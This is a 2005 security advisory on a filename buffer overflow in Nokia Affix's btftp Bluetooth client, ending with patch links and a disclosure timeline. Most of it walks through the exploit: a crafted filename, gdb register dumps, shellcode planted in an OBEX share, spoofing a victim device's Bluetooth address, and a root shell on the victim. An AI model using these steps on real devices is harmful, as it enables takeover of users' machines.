DMA[2005-0712a] - 'Nokia Affix Bluetooth btftp client buffer overflow' Author: Kevin Finisterre Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net Product: 'affix' References: http://www.digitalmunition.com/DMA[2005-0712a].txt Description: Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1, L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel' which provides kernel modules and 'affix' which provides control tools, libraries, and server daemons. Although Nokia believes that Affix is an useful piece of software, please bear in mind that it is not an official Nokia product, but a result of the research activity of Nokia Research Center. The Affix Bluetooth client utility 'btftp' contains a buffer overflow in the proccessing of long filenames. By placing a 102 character filename into a public bluetooth share you are able to overwrite the eip (on an x86 version) of the btftp client. In this example the machine 'frieza' (00:11:95:4f:60:1f) is running btsrv with OBEX File Transfer. Place a test file in the public bluetooth share. root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "41" x 98' . "DCBA"` Connect from a vulnerable client machine in order to demonstrate the overflow. Starting program: /usr/bin/btctl ftp Affix version: Affix 2.1.1 Wellcome to OBEX ftp. Type ? for help. Mode: Bluetooth SDP: yes ftp> open 00:11:95:4f:60:1f Connected. ftp> ls ----- 0 AAAAAAAAAAAAA...AAAAAAAAAAAAAADCBA d---- 0 Faxes d---- 0 New Folder d---- 0 SC Info Program received signal SIGSEGV, Segmentation fault. 0x41424344 in ?? () (gdb) i r eax 0x10 16 ecx 0x0 0 edx 0x4001a1e3 1073848803 ebx 0x41414141 1094795585 esp 0xbffffbc0 0xbffffbc0 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41424344 0x41424344 (gdb) x/4s $esp-100 0xbffffb5c: " Info" 0xbffffb62: "er" 0xbffffb65: 'A' , "DCBA" 0xbffffbc1: " \001@À\217\005\b" As a quick test we will use anathema@hack.co.za's 0xff-less execve() /bin/sh shellcode and a bit of perl to see if we can execute code. root@frieza:~# cd /var/spool/affix/Inbox/ root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "\x90" x (94-45)'``../ffless``perl -e 'print "\x5b\xfb\xff\xbf" x10 '` root@frieza:/var/spool/affix/Inbox# ls ?????????????????????????????????????????????????????0?.bin@???.sh!@?F?)??F??v??F??????K??S???[???[???[???[???[???[???[???[???[???[??? As you can see we are able to run our payload on the client machine, however in this case the shellcode needs to be swapped out for something more useful. threat:~# btftp Wellcome to OBEX ftp. Type ? for help. Mode: Bluetooth SDP: yes ftp> open 00:11:95:4f:60:1f Connected. ftp> ls -rwdx 1512 ffless.c -rwdx 12605 ffless -rwdx 0 ° Í Program received signal SIGTRAP, Trace/breakpoint trap. 0x40000c20 in ?? () from /lib/ld-linux.so.2 (gdb) c Continuing. sh-2.05b# Keep in mind that in order to exploit this the attacker MUST be able to convince the target to browse an obex file share that is under control of the attacker. Using an Ericsson ROK 101 008 bluetooth chip will increase our chances of success. Below shows an example impersonation scenario. First lets find someone to impersonate. root@frieza:~# btctl discovery Searching 8 sec ... Searching done. Resolving names ... done. +1: Address: 00:0c:76:46:f0:21, Class: 0xB20104, Key: "no", Name: "threat" Computer (Desktop) [Networking,Object Transfer,Audio,Information] +2: Address: 00:10:60:29:4f:f1, Class: 0x420210, Key: "no", Name: "Bluetooth Modem" Phone (Wired Modem/VoiceGW) [Networking,Telephony] +3: Address: 00:04:3e:65:a1:c8, Class: 0x120110, Key: "no", Name: "Pocket_PC" Computer (Handheld PC/PDA) [Networking,Object Transfer] Lets pretend to be some poor chaps PDA! We need to steal his BD_ADDR first. root@frieza:~# btctl bt0 01:02:03:04:05:06 Flags: UP DISC CONN RX: acl:159 sco:0 event:97 bytes:4810 errors:0 dropped:0 TX: acl:168 sco:0 cmd:29 bytes:19267 errors:0 dropped:0 Security: service pair [-auth, -encrypt] Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3 Role: deny switch, remain slave root@frieza:~# wget http://www.digitalmunition.com/setbd-affix.c --11:50:18-- http://www.digitalmunition.com/setbd-affix.c => `setbd-affix.c' Resolving www.digitalmunition.com... 195.74.102.163 Connecting to www.digitalmunition.com[195.74.102.163]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2,951 [text/plain] 100%[================================================================================>] 2,951 --.--K/s 11:50:19 (29.36 KB/s) - `setbd-affix.c' saved [2951/2951] root@frieza:~# cc -o setbd-affix setbd-affix.c -laffix root@frieza:~# ./setbd-affix 00:04:3e:65:a1:c8 Using BD_ADDR from command line Setting BDA to 00:04:3e:65:a1:c8 root@frieza:~# btctl reset root@frieza:~# btctl down root@frieza:~# btctl up btctl: cmd_initdev: Unable to start device (bt0) root@frieza:~# btctl up root@frieza:~# btctl bt0 00:04:3e:65:a1:c8 Flags: UP DISC CONN RX: acl:159 sco:0 event:126 bytes:5796 errors:0 dropped:0 TX: acl:168 sco:0 cmd:52 bytes:19885 errors:0 dropped:0 Security: service pair [-auth, -encrypt] Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3 Role: deny switch, remain slave root@frieza:~# btctl name "Pocket_PC" God I love my ROK chip! Start up btsrv and wait for a connection from your target. btsrv: main: btsrv started [Affix 2.1.2]. btsrv: start_service: Bound service Serial Port to port 1 btsrv: start_service: Bound service Dialup Networking to port 2 btsrv: start_service: Bound service Dialup Networking Emulation to port 3 btsrv: start_service: Bound service Fax Service to port 4 btsrv: start_service: Bound service LAN Access to port 5 btsrv: start_service: Bound service OBEX File Transfer to port 6 btsrv: start_service: Bound service OBEX Object Push to port 7 btsrv: start_service: Bound service Headset to port 8 btsrv: start_service: Bound service HeadsetAG to port 9 btsrv: start_service: Bound service HandsFree to port 10 btsrv: start_service: Bound service HandsFreeAG to port 11 You can tell that the target has connected by looking for the following in your btsrv logs. btsrv: handle_input: Connection from 00:0c:76:46:f0:21 channel 6 (OBEX File Transfer Profile) btsrv: execute_cmd: Socket multiplexed to stdin/stdout btsrv: signal_handler: Sig handler : 2 Upon connecting and performing a file list the target would see the following. threat:~# btftp Affix version: Affix 2.1.1 Wellcome to OBEX ftp. Type ? for help. Mode: Bluetooth SDP: yes ftp> open 00:04:3e:65:a1:c8 Connected. ftp> ls Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V Ï­¹¿)ýÞ ýÞÑýÞÐÉî¼Xq¶X6¶Y0 At this point your payload is running. After they have been exploited you could use a hijacked PAND connection to obtain your shell prompt. Or perhaps write some bluetooth aware shellcode. root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444 Trying 192.168.1.207... Connected to 192.168.1.207. Escape character is '^]'. id; uid=0(root) gid=0(root) groups=0(root) : command not found hostname; threat : command not found Official patches for Affix can be found at http://affix.sourceforge.net http://affix.sourceforge.net/affix_320_sec.patch http://affix.sourceforge.net/affix_212_sec.patch This is basic timeline associated with this bug. 07/12/05 Public disclosure 07/11/05 notice that Security update.Patch for affix-3.2.0 was posted 07/01/05 07/06/05 Ask Carlos for update... 07/05/05 str0ke dropped code on milw0rm - http://www.milw0rm.com/id.php?id=1081 06/17/05 Carlos.Chinea stated "you are using a old version of affix...Please update" 06/14/05 Carlos.Chinea contacted -KF